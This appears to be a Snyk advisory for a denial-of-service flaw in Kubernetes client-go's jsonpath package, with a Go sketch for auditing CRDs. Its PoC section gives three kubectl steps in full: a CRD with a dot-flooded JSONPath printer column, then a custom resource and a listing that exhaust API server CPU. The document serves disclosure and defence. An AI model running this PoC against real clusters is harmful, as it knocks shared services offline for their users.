Denial of Service (DoS) Affecting k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4


0.0
low
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • User Interaction

    Required

  • snyk-id

    SNYK-GOLANG-K8SIOKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597671

  • published

    24 Jul 2020

  • disclosed

    24 Jul 2020

  • credit

    lazydog

How to fix?

Upgrade k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.

Overview

k8s.io/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is a template engine that uses JSONPath syntax, which is described at http://goessner.net/articles/JsonPath/. In addition, it provides {range} and {end} functions to iterate over lists and slices.

Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.

PoC

  1. kubectl create -f - <<EOF
    apiVersion: apiextensions.k8s.io/v1beta1
    kind: CustomResourceDefinition
    metadata:
      name: foos.example.com
    spec:
      group: example.com
      scope: Namespaced
      names:
        plural: foos
        singular: foo
        kind: Foo
      version: v1
      additionalPrinterColumns:
      - name: FOO
        type: string
        JSONPath: ........................................................................................................................................................................................................
    EOF
    
  2. kubectl create -f - <<EOF
    apiVersion: example.com/v1
    kind: Foo
    metadata:
      name: foo-cr
    spec:
      foo:
        bar:
          baz:
            qux: data
    EOF
    
  3. kubectl get foo

The API server's CPU usage increases significantly.
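For clusters that cannot be upgraded immediately, existing CRDs can be audited for printer columns like the one in the PoC. The Go sketch below is an added example, not code from this advisory or from Kubernetes: it takes one CRD as JSON and flags columns whose JSONPath contains more `..` (recursive descent) operators than a threshold. The names `auditCRD` and `sampleCRD`, the threshold, and the shortened sample document are assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// column is one additionalPrinterColumns entry. encoding/json matches keys
// case-insensitively, so this reads "JSONPath" (v1beta1) and "jsonPath" (v1).
type column struct {
	Name     string `json:"name"`
	JSONPath string `json:"jsonPath"`
}

type crd struct {
	Metadata struct{ Name string `json:"name"` } `json:"metadata"`
	Spec     struct {
		Columns  []column `json:"additionalPrinterColumns"` // v1beta1 location
		Versions []struct {
			Columns []column `json:"additionalPrinterColumns"` // v1 location
		} `json:"versions"`
	} `json:"spec"`
}

// sampleCRD is a constructed, shortened stand-in for the CRD in the PoC.
const sampleCRD = `{"metadata":{"name":"foos.example.com"},"spec":{"additionalPrinterColumns":[
 {"name":"FOO","JSONPath":"........"},{"name":"AGE","JSONPath":".metadata.creationTimestamp"}]}}`

// auditCRD returns one finding per printer column whose JSONPath holds more
// than maxDescents ".." operators. maxDescents is a local policy choice.
func auditCRD(raw []byte, maxDescents int) ([]string, error) {
	var c crd
	if err := json.Unmarshal(raw, &c); err != nil {
		return nil, err
	}
	cols := append([]column{}, c.Spec.Columns...)
	for _, v := range c.Spec.Versions {
		cols = append(cols, v.Columns...)
	}
	var findings []string
	for _, col := range cols {
		if n := strings.Count(col.JSONPath, ".."); n > maxDescents {
			findings = append(findings, fmt.Sprintf("%s column %q: %d recursive descents", c.Metadata.Name, col.Name, n))
		}
	}
	return findings, nil
}

func main() { fmt.Println(auditCRD([]byte(sampleCRD), 1)) }
```

Each item of `kubectl get crd -o json` output can be passed to `auditCRD` individually; a finding means the column definition should be reviewed, not that the API server is necessarily affected.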